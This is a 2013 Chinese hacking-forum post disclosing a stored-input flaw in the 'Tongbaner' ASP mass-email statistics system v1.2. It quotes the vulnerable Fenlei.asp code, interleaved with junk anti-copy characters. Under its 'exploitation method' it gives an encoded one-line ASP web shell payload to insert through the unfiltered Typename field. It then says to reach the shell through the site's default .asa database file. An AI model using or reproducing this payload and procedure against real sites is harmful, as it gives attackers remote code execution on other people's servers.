找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2055|回复: 0
打印 上一主题 下一主题

铜板儿网邮件群发统计系统 v1.2 漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:14:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
'Fenlei.asp
# V3 L! ~. E- A
9 D5 w5 d+ l, F4 N' XIF Request.QueryString("Action")="del" Then ( p% t) F# y$ X# J/ K* s/ `
ID=Request.QueryString("ID")
4 Y- \0 Z* D- s8 J& O1 P  KIF Countss ("tui","Fenlei",ID )<>0 then
( E2 z! Q7 y! V) v, P2 d'略 4 `% M0 N" k" R* d6 \$ c' C- H0 u; ^0 N
IF Request.QueryString("Action")="Add" Then + H; Z8 t, S# `
Tname=Request.Form("Typename")
$ e# t( u  C6 ~5 NSet Rs=Server.CreateObject("adodb.Recordset")
- |! ^  ^7 D6 h) ^6 xSql="Select * From Fenlei Order by id Desc "
; J9 B) Z" u& dRs.Open Sql,Conn,1,3
* s, i1 g( K. o8 K4 [2 _Rs.Addnew 6 ^$ U3 N! E8 P# [) B$ b! Z% j
Rs("Typename")=Tname " h* b0 Z5 T  k) A( V& Y
'略   C! R0 G" s" r# n0 ]2 U
Set Rs=Server.CreateObject("adodb.Recordset") : h6 @0 h! y% h. P
Sql="Select * From Fenlei Order by id Desc "
8 ?9 g$ @8 t0 b0 @Rs.Open Sql,Conn,1,1 , f  c+ o$ A8 v, s
'略 % {# F& T1 V# j5 e8 ?9 w4 Y
%>
. Z6 p) w1 ^$ w# u8 I% I* l 5 I' H3 v) S' H6 {% c$ R0 h) G6 v

  V6 r  ~8 A7 H+ ]: Y ! `% P1 w8 g5 v3 G, o/ c9 j+ D
没有过滤,直接写入数据库。3 m( k# ]+ h. z( }* u3 t$ V/ E

2 S9 T4 B4 T2 w7 E: U5 E利用方法:( |% B- j. P) a2 S) Q& V

  e5 ]+ ]- y; X# p" [* P插入:┼攠數畣整爠煥敵瑳∨≡┩>! s9 v! d5 o4 _* i1 c! ^1 _; }. a" P% q

+ x- Y0 c% J) _- g8 Z * `# q6 ~) o6 K6 |2 [
连接: http://www.xxx.com/###tongbaner.asa 0 v7 Z1 {0 |+ @' _# f0 t. u- j, X
'默认安装文件:
8 [1 z$ l3 L: p'install.asp
' c+ J/ h4 J2 c3 W
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表